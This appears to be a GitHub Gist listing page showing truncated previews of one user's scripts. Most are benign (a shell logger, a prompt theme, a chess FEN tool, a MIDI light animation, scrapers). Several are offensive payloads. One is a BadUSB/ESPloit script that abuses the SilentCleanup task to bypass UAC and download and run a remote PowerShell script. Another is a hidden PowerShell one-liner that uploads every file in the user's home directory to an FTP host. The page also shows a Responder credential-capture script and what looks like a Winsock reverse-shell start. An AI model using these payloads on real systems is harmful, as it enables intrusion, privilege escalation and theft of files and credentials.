This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Print banner | |
echo "" | |
echo "[!] You are now in shaha, a shell which helps with keeping track of used commands using aha." | |
echo "[!] Klepvink, 2025" | |
echo "" | |
# Spawn interactive shell, pipes all output to aha | |
python3 -c 'import pty; pty.spawn("/bin/bash")' | tee >(aha > $(date +%F_%H-%M-%S).html) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"$schema": "https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/main/themes/schema.json", | |
"blocks": [ | |
{ | |
"alignment": "left", | |
"segments": [ | |
{ | |
"foreground": "#ff5555", | |
"properties": { | |
"time_format": "15:04:05" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python3 | |
# Title: FenDiff | |
# Author: Klepvink | |
# Version: 1.0 | |
# Checks two different FEN-strings, and determines the move that was made using only standard python modules and functions (and returns in UCI-format) | |
# The original purpose of this code is to help determine the move made based on only FEN-data. The chessboard sends a continuous stream | |
# of current positions in the form of FEN, and this code determines what move was made using that FEN-data by comparing it to the last |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Launchkey Mini II Sweep Animation | |
# by David Madison © 2018 | |
# www.partsnotincluded.com | |
# | |
# | |
# Modified to work for the Launchkey 25 MK2. | |
# Instead of the original sweep, it now displays | |
# a looping rainbow fade. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Rem:Generated by Dckuino.js by NURRL | |
Rem:Modified for use with ESPloit by Corey Harding | |
Rem:----- | |
Press:131+114 | |
CustomDelay:500 | |
Print:powershell -c "$r='HKCU:\Environment';$n='windir';$v='powershell IEX (wget {LINK_TO_POWERSHELL_SCRIPT} -useBasicParsing).content;#';sp -Path $r -Name $n -Value $v;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I;rp -Path $r -Name $n" | |
Press:176 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <winsock2.h> | |
#include <windows.h> | |
#include <ws2tcpip.h> | |
#include <iostream> | |
#include <stdio.h> | |
using namespace std; | |
#pragma comment(lib, "Ws2_32.lib") | |
#define DEFAULT_BUFLEN 1024 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Title: Quickcreds - croco-flavor | |
# Author: Klepvink -- Cred: Hak5Darren && Mubix (based this script on https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/credentials/QuickCreds/payload.txt) | |
# Version: 1.0 | |
# | |
# First making sure that Responder is installed (in the right location) | |
echo -e "" | |
echo -e "\e[32mQuickcreds - croco-flavor\e[0m" | |
echo -e "\e[32mKlepvink -- Cred: Hak5Darren && Mubix\e[0m" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -w hidden -c "$w=New-Object System.Net.WebClient;$w.Credentials=New-Object System.Net.NetworkCredential('anonymous');foreach($i in(dir $HOME '*' -Recurse)){$u=New-Object System.Uri('ftp://10.8.0.1/'+$i.Name);$w.UploadFile($u,$i.FullName)}" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from tika import parser | |
import sys | |
import os | |
import re | |
from docx import Document | |
document = Document() | |
def filecheck(filepath): | |
return os.path.isfile(filepath) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
from selenium import webdriver | |
from selenium.webdriver.common.keys import Keys | |
from selenium.common.exceptions import NoSuchElementException | |
idRow = [["00", "01", "02", "03", "04", "05", "06", "07", "08"], | |
["10", "11", "12", "13", "14", "15", "16", "17", "18"], | |
["20", "21", "22", "23", "24", "25", "26", "27", "28"], | |
["30", "31", "32", "33", "34", "35", "36", "37", "38"], | |
["40", "41", "42", "43", "44", "45", "46", "47", "48"], |
NewerOlder